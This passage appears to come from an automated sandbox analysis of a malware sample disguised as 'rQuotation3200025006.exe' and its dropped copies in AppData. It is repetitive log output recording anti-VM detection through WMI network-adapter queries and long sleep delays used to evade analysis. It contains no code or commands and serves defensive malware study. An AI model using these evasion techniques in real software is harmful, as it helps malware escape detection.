                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: rQuotation3200025006.exe PID: 6744, type: MEMORYSTR
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeMemory allocated: 8A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeMemory allocated: 26B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeMemory allocated: 2560000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeMemory allocated: 7800000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeMemory allocated: 8800000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeMemory allocated: 89C0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeMemory allocated: 99C0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeMemory allocated: 1190000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeMemory allocated: 2C60000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeMemory allocated: 1190000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeMemory allocated: D20000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeMemory allocated: 26A0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeMemory allocated: 2500000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeMemory allocated: 72F0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeMemory allocated: 82F0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeMemory allocated: 8490000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeMemory allocated: 9490000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeMemory allocated: 18C0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeMemory allocated: 34B0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeMemory allocated: 32F0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: AA0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 24D0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 22C0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 7280000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 8280000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 8430000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 9430000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 3020000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 31F0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 51F0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 2C90000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 2ED0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 2D10000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 7C40000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 8C40000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 8DF0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 9DF0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 32C0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 3360000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 5360000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 599765Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 599656Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 599546Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 599437Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 599328Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 599218Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 599109Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 598999Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 598889Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 598781Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 598672Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 598561Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 598451Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 598343Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 598234Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 598124Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 598002Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 597789Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 597683Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 597553Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 597422Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 597308Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 597187Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 597078Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 596968Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 596859Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 596750Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 596640Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 596531Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 596417Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 596297Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 596187Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 596078Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 595968Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 595859Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 595749Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 595639Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 595531Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 595410Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 595279Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 595169Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 594864Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 594734Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 594585Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 594468Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 594359Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 594244Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 594125Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 594015Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 600000
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 599859
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 599750
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 599640
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 599531
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 599421
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 599312
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 599203
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 599093
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 598984
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 598874
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 598726
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 598609
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 598499
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 598390
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 598281
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 598171
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 598059
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 597953
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 597843
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 597317
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 597165
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 597049
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 596921
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 596812
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 596697
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 596574
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 596468
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 596302
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 596171
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 596062
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 595949
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 595843
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 595734
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 595624
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 595515
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 595406
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 595268
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 595146
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 594450
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 594343
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 594234
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 594125
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 594015
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 593906
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 593794
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 593687
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 593578
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 593464
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 593310
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 600000
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599890
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599768
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599640
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599454
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599328
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599217
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599109
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599000
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598890
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598781
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598671
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598562
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598453
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598343
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598234
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598125
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598015
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597906
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597796
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597687
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597578
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597468
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597359
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597250
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597140
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597031
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596921
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596812
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596703
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596593
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596484
